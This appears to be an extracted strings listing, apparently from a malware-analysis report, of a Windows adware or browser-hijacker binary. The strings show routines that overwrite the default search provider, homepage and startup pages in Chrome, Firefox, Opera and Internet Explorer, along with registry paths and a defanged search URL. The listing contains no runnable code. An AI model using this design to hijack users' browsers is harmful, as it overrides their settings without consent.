
Could not create pipe event. %%s

Could not create pipe event. %%s

Pipe connecting error. %%s

Pipe connecting error. %%s

Error code: %u ('%s')

Error code: %u ('%s')

Not enough memory. Size: %s (%s)

Not enough memory. Size: %s (%s)

Could not create IPC event. %%s

Could not create IPC event. %%s

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

Content-Type: multipart/form-data; boundary=%s

XXX

XXX

HTTP/1.1

HTTP/1.1

Content-Disposition: form-data; name="%s"

Content-Disposition: form-data; name="%s"

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

HTTP/1.0

HTTP/1.0

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

[SynchronousPipe::Read]

[SynchronousPipe::Read]

[SynchronousPipe::Write]

[SynchronousPipe::Write]

CChromeExtension::GetFileListInExtenstion

CChromeExtension::GetFileListInExtenstion

__MSG_

__MSG_

messages.json

messages.json

manifest.json

manifest.json

CHROME.EXE

CHROME.EXE

[Chrome::BrowserInfo::Query]

[Chrome::BrowserInfo::Query]

WebData

WebData

SHELL32.DLL

SHELL32.DLL

e\Application\chrome.exe

e\Application\chrome.exe

Google\Chrome

Google\Chrome

\resources.pak

\resources.pak

\Google\Chrome\Application\chrome.exe

\Google\Chrome\Application\chrome.exe

\Google\Chrome\Application\

\Google\Chrome\Application\

\Web Data

\Web Data

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetProviderId]

[SQLite::Implementation::GetProviderId]

chrome-extension://

chrome-extension://

13050095043000000

13050095043000000

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

4BB42133-5533-4A0C-BF72-F1B8C8776A11

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking

Checking

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build]

[Monitor::RestoreData::Controller::Build]

[Monitor::RestoreData::Controller::Build]

[Monitor::RestoreData::Controller::Build]

[Injection::Snapshot::Builder::BuildSettings]

[Injection::Snapshot::Builder::BuildSettings]

[Injection::Snapshot::Builder::BuildSettings]

[Injection::Snapshot::Builder::BuildSettings]

Injection::Snapshot::Parser::Parse

Injection::Snapshot::Parser::Parse

new

new

Injection::Snapshot::Parser::Parse

Injection::Snapshot::Parser::Parse

new

new

[Injection::Snapshot::Parser::Parse]

[Injection::Snapshot::Parser::Parse]

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

[Injection::Snapshot::Parser::Parse]

[Injection::Snapshot::Parser::Parse]

Chrome::BrowserSettings::Create

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsChromeInstalled]

[Injection::Snapshot::Controller::IsChromeInstalled]

Firefox::BrowserSettings::Create

Firefox::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::RestoreState

Firefox::BrowserSettings::RestoreState

Chrome::BrowserSettings::RestoreState

Chrome::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.SystemConfig:

Argument.Config::User:

Argument.Config::User:

Argument.Config::General:

Argument.Config::General:

Chrome::BrowserSettings::PropagateState

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

[WatchmanKey::GetEncryptionKey]

MachineKey::Generate

MachineKey::Generate

MachineKey::Create

MachineKey::Create

[WatchmanKey::LoadEncodedData]

[WatchmanKey::LoadEncodedData]

[WatchmanKey::CleanupKey]

[WatchmanKey::CleanupKey]

WatchmanKey::GetEncryptionKey

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

[WatchmanKey::SaveEncodedData]

WatchmanKey::System::Open

WatchmanKey::System::Open

[WatchmanKey::System::LoadGeneralConfig]

[WatchmanKey::System::LoadGeneralConfig]

[WatchmanKey::System::SaveGeneralConfig]

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::LoadEncodedData

WatchmanKey::LoadEncodedData

WatchmanKey::SaveEncodedData

WatchmanKey::SaveEncodedData

WatchmanKey::System::Ensure

WatchmanKey::System::Ensure

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::System::LoadSystemConfig]

[WatchmanKey::System::LoadSystemConfig]

WatchmanKey::EnsureKey

WatchmanKey::EnsureKey

[WatchmanKey::Users::Ensure]

[WatchmanKey::Users::Ensure]

WatchmanKey::OpenKey

WatchmanKey::OpenKey

[WatchmanKey::Users::Open]

[WatchmanKey::Users::Open]

[WatchmanKey::Users::LoadConfiguration]

[WatchmanKey::Users::LoadConfiguration]

[WatchmanKey::Users::SaveConfiguration]

[WatchmanKey::Users::SaveConfiguration]

WatchmanKey::Users::Ensure

WatchmanKey::Users::Ensure

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

WatchmanKey::SystemKey::Open

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

smod.xml

smod.xml

SearchModulePlus.crx

SearchModulePlus.crx

DATAMNGR.DLL

DATAMNGR.DLL

IEBHO.DLL

IEBHO.DLL

VC32.DLL

VC32.DLL

[Config::General::UrlSet::Copy]

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Chrome::Settings::Copy]

[Config::General::Chrome::Settings::Copy]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Firefox::Settings::Dump]

[Config::General::Opera::Settings::Dump]

[Config::General::Opera::Settings::Dump]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Copy]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseOperaSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

eReadStringNode

eReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseChromeSettings]

[Config::General::Parser::ParseChromeSettings]

Config::General::Parser::ParseChromeValueSets

Config::General::Parser::ParseChromeValueSets

MissedElement

MissedElement

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseChromeValueSets]

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseFirefoxSettings]

[Config::General::Parser::ParseFirefoxSettings]

ReadStringNode

ReadStringNode

Config::General::Parser::ParseFirefoxValueSets

Config::General::Parser::ParseFirefoxValueSets

MissedElement

MissedElement

ReadOptionalStringNode

ReadOptionalStringNode

[Config::General::Parser::ParseFirefoxValueSets]

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode

ReadOptionalStringNode

lReadOptionalStringNode

lReadOptionalStringNode

MissedElement

MissedElement

[Config::General::Parser::ParseUrlSet]

[Config::General::Parser::ParseUrlSet]

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

yReadStringNode

yReadStringNode

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseOperaSettings]

[Config::General::Parser::ParseOperaSettings]

ReadStringNode

ReadStringNode

MissedElement

MissedElement

ReadStringNode

ReadStringNode

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

We couldn't find the URL Set section... probably an old configuration!

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

WatchmanKey::System::SaveGeneralConfig

2.1.0.7

2.1.0.7

2.0.0.0

2.0.0.0

ReadOptionalStringNode

ReadOptionalStringNode

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

ReadBooleanNode

ReadBooleanNode

ReadBooleanNode

ReadBooleanNode

Could not find URL Set in configuration. Probably older configuration.

Could not find URL Set in configuration. Probably older configuration.

ReadBooleanNode

ReadBooleanNode

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildFirefoxSettings]

[Config::User::Builder::BuildFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

[Config::User::Builder::BuildChromeSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

WatchmanKey::User::SaveConfiguration

Mozilla\Firefox\

Mozilla\Firefox\

profiles.ini

profiles.ini

prefs.js

prefs.js

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::QueryProfiles]

[Firefox::InstallInfo::QueryProfiles]

[Firefox::InstallInfo::ParseProfiles]

[Firefox::InstallInfo::ParseProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

[Firefox::InstallInfo::Query]

No profiles found! Maybe - first start of Firefox?

No profiles found! Maybe - first start of Firefox?

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Internet Explorer\AboutURLs

Software\Microsoft\Internet Explorer\AboutURLs

TopResultURLFallback

TopResultURLFallback

SuggestionURL

SuggestionURL

FaviconURL

FaviconURL

IEXPLORE.EXE

IEXPLORE.EXE

Failed to call enum URL's. Error:

Failed to call enum URL's. Error:

Software\Microsoft\Internet Explorer\URLSearchHooks

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Result.SearchScope:

Result.SearchScope:

Argument.SearchScopeToSearch:

Argument.SearchScopeToSearch:

Argument.Parent:

Argument.Parent:

[Explorer::BrowserSettings::DeleteKey]

[Explorer::BrowserSettings::DeleteKey]

Argument.Subkey:

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

VirtualSpeedbitSearchScopeKey::EnsureKeyW

Key deleted:

Key deleted:

TopResultURL

TopResultURL

FaviconURLFallback

FaviconURLFallback

SuggestionsURL

SuggestionsURL

SuggestionsURLFallback

SuggestionsURLFallback

\Opera\launcher.exe

\Opera\launcher.exe

Opera Software\Opera Stable\

Opera Software\Opera Stable\

\Opera\

\Opera\

\opera.pak

\opera.pak

Web Data

Web Data

\resources\default_partner_content.json

\resources\default_partner_content.json

KERNELBASE.DLL

KERNELBASE.DLL

Chrome::InstallInfo::Get

Chrome::InstallInfo::Get

[Chrome::BrowserSettings::OpenConfigFiles]

[Chrome::BrowserSettings::OpenConfigFiles]

SQLite::WebDataDB::Create

SQLite::WebDataDB::Create

Argument.HomePageUrl:

Argument.HomePageUrl:

[Chrome::BrowserSettings::SetHomePagePreferences]

[Chrome::BrowserSettings::SetHomePagePreferences]

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.HomePageIsNewTabPage:

Argument.HomePageIsNewTabPage:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderId:

Argument.DefaultProviderId:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderName:

Argument.DefaultProviderName:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSearchUrl:

Argument.DefaultProviderSearchUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.DefaultProviderSuggestUrl:

Argument.DefaultProviderSuggestUrl:

Argument.UrlsToRestoreOnStartup:

Argument.UrlsToRestoreOnStartup:

Argument.RestoreOnStartup:

Argument.RestoreOnStartup:

Argument.KeywordToSearch:

Argument.KeywordToSearch:

[Chrome::BrowserSettings::GetSearchProviderId]

[Chrome::BrowserSettings::GetSearchProviderId]

SQLite::WebDataDB::GetProviderById

SQLite::WebDataDB::GetProviderById

SQLite::WebDataDB::GetFirstProviderId

SQLite::WebDataDB::GetFirstProviderId

[Chrome::BrowserSettings::EnsureSearchProvider]

[Chrome::BrowserSettings::EnsureSearchProvider]

Result.ProviderId:

Result.ProviderId:

[Chrome::BrowserSettings::DeleteSearchProvider]

[Chrome::BrowserSettings::DeleteSearchProvider]

SQLite::WebDataDB::Values::Create

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::DeleteSearchProvider

Chrome::BrowserSettings::DeleteSearchProvider

Chrome::BrowserSettings::OpenConfigFiles

Chrome::BrowserSettings::OpenConfigFiles

SQLite::WebDataDB::SetDefaultProvider

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

Chrome::BrowserSettings::EnsureSearchProvider

%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

SearchProtocolHost.exe_3464:


SearchFilterHost.exe_3964:
